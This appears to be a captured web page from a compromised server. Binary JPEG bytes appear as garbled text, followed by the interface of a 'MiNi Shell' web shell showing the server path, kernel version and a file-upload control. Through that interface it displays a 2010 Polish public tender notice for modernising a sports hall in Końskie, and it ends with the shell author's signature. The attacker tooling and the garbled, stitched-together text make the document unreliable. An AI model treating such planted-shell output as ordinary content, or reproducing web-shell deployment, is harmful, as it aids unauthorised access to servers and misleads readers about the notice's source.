JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20100119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20100119/12107-N-2010.html

<p class="kh_header"><b>Końskie: Zadanie nr 1-Termomodernizacja budynku Hali Sportowej 
przy ulicy Kpt. Stoińskiego w Końskich
i/lub
Zadanie nr 2 -Modernizacja Hali Sportowej przy ulicy  
Kpt. Stoińskiego w Końskich</b><br>
<b>Numer ogłoszenia: 12107 - 2010; data zamieszczenia: 19.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Końskie , ul. Partyzantów 1/24, 26-200 Końskie, woj. świętokrzyskie, tel. 041 3723249, 3723720, faks 041 3722955.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umkonskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zadanie nr 1-Termomodernizacja budynku Hali Sportowej 
przy ulicy Kpt. Stoińskiego w Końskich
i/lub
Zadanie nr 2 -Modernizacja Hali Sportowej przy ulicy  
Kpt. Stoińskiego w Końskich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
 Zadanie Nr 1. Termomodernizacja budynku Hali Sportowej przy ulicy Kpt. Stoińskiego 
w Końskich.
Przedmiotem zamówienia jest zaprojektowanie i wykonanie zadania pn. Termomodernizacja budynku Hali Sportowej przy ulicy Kpt. Stoińskiego w Końskich. Szczegóły określa załącznik nr 1A (Program funkcjonalno-użytkowy)
Wykonawca zobowiązany jest dokonać wyłączenia z dokumentacji elementów 
już wykonanych (nieobjętych zmianami na etapie projektowania) w ramach wcześniejszych prac zgodnie z przedstawioną inwentaryzacją powykonawczą.
Rozwiązania projektowe w fazie wstępnej ( koncepcja) oraz w wersji ostatecznej należy przedstawić do akceptacji Zamawiającego.
Inwestor informuje o możliwości wykonywania dwóch zadań przez różnych Wykonawców na tym samym obiekcie i w tym samym czasie. W przypadku zaistnienia takiej sytuacji inwestor oczekuje i zobowiązuje do zgodnej współpracy, oraz zachowania zasad bezpieczeństwa trakcie wykonywania obu zadań przez obydwóch Wykonawców.
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej budowy celem sprawdzenia warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych 
do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca.

Zadanie Nr 2. Remont i modernizacja Hali Sportowej przy ulicy Kpt. Stoińskiego 
w Końskich.
Przedmiotem Zamówienia jest kompleksowa wymiana instalacji elektrycznej, oświetlenia oraz monitoringu zgodnie z Projektem modernizacji instalacji i monitoringu Hali Sportowej opracowanym przez przez Cities Lighting Consultans Sp. zo.o., 02-828 Warszawa, 
ul. Olczyska 1.
W zakres zamówienia wchodzi:
-Demontaż istniejącej instalacji 
-Modernizacja tablicy RG
-Wykonanie linii zasilającej z rozdzielnicy głównej RG do tablic TR-1
-Wymiana tablicy TR-1
-Wymiana i wykonanie zasilenia opraw oświetleniowych
-Wykonanie instalacji oświetlenia ewakuacyjnego i awaryjnego
-Wykonanie sterowania oświetlenia Hali
-Montaż oświetlenia sal i płyt boisk
-Wykonanie instalacji gniazd wtykowych 230V
-Wykonanie siły
-Wykonanie instalacji monitoringu wizyjnego wewnątrz i na zewnątrz hali
-Zapewnienie podłączenia projektowanego oświetlenia parkingu.
Szczegóły zadania nr 2 określa Załącznik nr 1B. 
Dopuszcza się składanie ofert równoważnych:
Dopuszcza się użycie innych opraw oświetleniowych, jednak pod warunkiem wykonania projektu równoważnego i uzyskania wyników nie gorszych niż w projekcie załączonym 
do dokumentacji i spełniając wymagania Polskiej Normy PN-EN 12193 i wymagań Zamawiającego. Zmiana miejsc montażu opraw wymaga uzgodnień z projektantem.
Koszty odwiedzenia placu budowy poniesie Wykonawca.


Inwestor informuje o możliwości wykonywania dwóch zadań przez różnych Wykonawców na tym samym obiekcie i w tym samym czasie. W przypadku zaistnienia takiej sytuacji inwestor oczekuje i zobowiązuje do zgodnej współpracy, oraz zachowania zasad bezpieczeństwa trakcie wykonywania obu zadań przez obydwóch Wykonawców.
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej budowy celem sprawdzenia warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 73.13.20.00-7, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 180.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Każdy Wykonawca przystępujący do przetargu obowiązany jest wnieść wadium najpóźniej do dnoa 09.02.2010 do godziny 09:00 czasu loklanego w wysokości: zadanie 1- 35795,00 zł, zadanie 2- 5 528,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy, którzy:
a)	Spełniają warunki wynikające z art. 22 ust. 1 ustawy - Prawo zamówień publicznych, 
b)	Nie zostali wykluczeni z udziału w postępowaniu na podst. art. 24 ust. 1 i 2 ustawy - Prawo zamówień publicznych,
c)	Dysponują osobami zdolnymi do wykonania zamówienia 
* Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach
zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,
niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania 
z nich przy wykonywaniu zamówienia.

d)	Wykonali w okresie ostatnich 5 lat, a jeśli okres prowadzenia działalności jest krótszy w tym okresie co najmniej dwie roboty, które odpowiadają swoim rodzajem i wartością przedmiotowi niniejszego zamówienia.

 
Ocena spełniania wymaganych warunków dokonywana będzie według kryteriów spełnia/ nie spełnia na podstawie n.w. oświadczeń i dokumentów:.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a) wypełniony i podpisany FORMULARZ OFERTOWY, którego wzorzec przedstawiono w rozdziale D niniejszej specyfikacji istotnych warunków zamówienia,
b)	Oświadczenie na podstawie art. 22 ust. 1 ustawy prawo zamówień publicznych,
c)	Oświadczenie na podstawie art. 24 ust.1 ustawy prawo zamówień publicznych,
d)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie 
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawiony 
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
e)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego    oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, 
lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie 
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
f)	Wykaz wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie  do udziału w postępowaniu o udzielenie zamówienia, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, 
co najmniej dwóch robót budowlanych, które odpowiadają swoim rodzajem i wartością przedmiotowi niniejszego zamówienia z podaniem ich wartości, dat wykonania i odbiorców oraz dokumenty potwierdzające, że roboty 
te zostały wykonane należycie (wg wzoru - zał.). Oddzielnie dla zadania 1 oraz dla zadania 2 
g)	Wykaz osób, którymi dysponuje. Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, w tym:
Dla Zadania 1- co najmniej 1 osoba posiadająca uprawnienia budowlane, projektowe 
i wykonawcze do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności konstrukcyjno-budowlanej, instalacji sanitarnych, instalacji elektrycznych oraz kserokopie uprawnień, oraz kserokopie potwierdzające przynależność do właściwej izby samorządu zawodowego (wg wzoru - zał. do oferty przetargowej) .
Dla zadania nr 2 co najmniej 1 osoba posiadająca uprawnienia budowlane, projektowe 
i wykonawcze do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w specjalności, instalacji elektrycznych oraz kserokopie uprawnień, oraz kserokopie potwierdzające przynależność do właściwej izby samorządu zawodowego (wg wzoru - zał. do oferty przetargowej) .
h)	Kosztorys ofertowy
- ze względu na ryczałtowy charakter wynagrodzenia wszelkie błędy wynikające 
z treści w/w dokumentu  nie  będą miały wpływu na ocenę oferty Wykonawcy
i)	Pełnomocnictwo określające jego zakres w przypadku, gdy wykonawcę reprezentuje pełnomocnik, lub w przypadku wykonawców składających ofertę wspólną. Forma pełnomocnictwa: oryginał lub kopia poświadczona przez notariusza..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umkonskie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Końskich, 26-200 Końskie, ul. Partyzantów 1 pok. 37.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2010 godzina 09:00, miejsce: Urząd Miasta i Gminy w Końskich, 26-200 Końskie, ul. Partyzantów 1 pok. 24 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Termomodernizacja budynku Hali Sportowej przy ulicy Kpt. Stoińskiego 
w Końskich..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zaprojektowanie i wykonanie zadania pn. Termomodernizacja budynku Hali Sportowej przy ulicy Kpt. Stoińskiego w Końskich. Szczegóły określa załącznik nr 1A (Program funkcjonalno-użytkowy).
Wykonawca zobowiązany jest dokonać wyłączenia z dokumentacji elementów 
już wykonanych (nieobjętych zmianami na etapie projektowania) w ramach wcześniejszych prac zgodnie z przedstawioną inwentaryzacją powykonawczą.
Rozwiązania projektowe w fazie wstępnej ( koncepcja) oraz w wersji ostatecznej należy przedstawić do akceptacji Zamawiającego.
Inwestor informuje o możliwości wykonywania dwóch zadań przez różnych Wykonawców na tym samym obiekcie i w tym samym czasie. W przypadku zaistnienia takiej sytuacji inwestor oczekuje i zobowiązuje do zgodnej współpracy, oraz zachowania zasad bezpieczeństwa trakcie wykonywania obu zadań przez obydwóch Wykonawców.
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej budowy celem sprawdzenia warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych 
do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 71.32.00.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 180.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Modernizacja Hali Sportowej przy ulicy  
Kpt. Stoińskiego w Końskich.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem Zamówienia jest kompleksowa wymiana instalacji elektrycznej, oświetlenia oraz monitoringu zgodnie z Projektem modernizacji instalacji i monitoringu Hali Sportowej opracowanym przez przez Cities Lighting Consultans Sp. zo.o., 02-828 Warszawa, 
ul. Olczyska 1.
W zakres zamówienia wchodzi:
-Demontaż istniejącej instalacji 
-Modernizacja tablicy RG
-Wykonanie linii zasilającej z rozdzielnicy głównej RG do tablic TR-1
-Wymiana tablicy TR-1
-Wymiana i wykonanie zasilenia opraw oświetleniowych
-Wykonanie instalacji oświetlenia ewakuacyjnego i awaryjnego
-Wykonanie sterowania oświetlenia Hali
-Montaż oświetlenia sal i płyt boisk
-Wykonanie instalacji gniazd wtykowych 230V
-Wykonanie siły
-Wykonanie instalacji monitoringu wizyjnego wewnątrz i na zewnątrz hali
-Zapewnienie podłączenia projektowanego oświetlenia parkingu.
Szczegóły zadania nr 2 określa Załącznik nr 1B. 
Dopuszcza się składanie ofert równoważnych:
Dopuszcza się użycie innych opraw oświetleniowych, jednak pod warunkiem wykonania projektu równoważnego i uzyskania wyników nie gorszych niż w projekcie załączonym 
do dokumentacji i spełniając wymagania Polskiej Normy PN-EN 12193 i wymagań Zamawiającego. Zmiana miejsc montażu opraw wymaga uzgodnień z projektantem.
Koszty odwiedzenia placu budowy poniesie Wykonawca.


Inwestor informuje o możliwości wykonywania dwóch zadań przez różnych Wykonawców na tym samym obiekcie i w tym samym czasie. W przypadku zaistnienia takiej sytuacji inwestor oczekuje i zobowiązuje do zgodnej współpracy, oraz zachowania zasad bezpieczeństwa trakcie wykonywania obu zadań przez obydwóch Wykonawców.
Każdy Wykonawca winien dokonać wizji lokalnej na miejscu planowanej budowy celem sprawdzenia warunków związanych z wykonaniem prac będących przedmiotem przetargu oraz celem uzyskania jakichkolwiek dodatkowych informacji koniecznych i przydatnych do oceny prac, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy.
Koszty odwiedzenia placu budowy poniesie Wykonawca..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.31.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com